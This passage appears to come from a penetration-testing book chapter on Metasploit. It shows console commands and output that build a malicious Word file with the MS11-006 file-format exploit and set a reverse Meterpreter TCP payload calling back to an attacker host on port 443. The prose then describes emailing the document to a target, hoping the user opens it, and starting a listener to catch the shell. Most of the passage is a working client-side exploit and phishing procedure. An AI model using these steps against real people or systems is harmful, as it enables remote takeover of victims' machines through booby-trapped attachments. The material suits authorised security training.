Page 146

120

Chapter 8

available. In the next example, you can see that the file format is exported as
a document:

msf >

use windows/fileformat/ms11_006_createsizeddibsection

msf exploit(ms11_006_createsizeddibsection) >

info

. . . SNIP . . .

Available targets:
  Id Name
  -- ----
  0 Automatic
  1 Windows 2000 SP0/SP4 English
  2 Windows XP SP3 English
  3 Crash Target for Debugging

Next, you can see that we have a few targets available to use, but we’ll

make it automatic and leave everything at the default settings:

Basic options:
  Name      Current Setting                Required Description
  ----      ---------------                -------- -----------
  FILENAME msf.doc                    yes     The file name.
  OUTPUTPATH /opt/metasploit3/msf3/data/exploits yes     The location of the file.

We’ll need to set a payload as usual. In this case, we will select our first

choice, a reverse Meterpreter shell:

msf exploit(ms11_006_createsizeddibsection) >

set payload

windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) >

set LHOST 172.16.32.128

LHOST => 172.16.32.128
smsf exploit(ms11_006_createsizeddibsection) >

set LPORT 443

LPORT => 443
msf exploit(ms11_006_createsizeddibsection) >

exploit

[*] Creating 'msf.doc' file...
[*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) >

Sending the Payload

Our file was exported as

msf.doc

and sent to the

/opt/

directory within

Metasploit. Now that we have our malicious document, we can craft up an
email to our target and hope the user opens it. At this point, we should
already have an idea of the target’s patch levels and vulnerabilities. Before
we actually open the document, we need to set up a multi-handler listener.
This will ensure that when the exploit is triggered, the attacker machine can
receive the connection back from the target machine (reverse payload).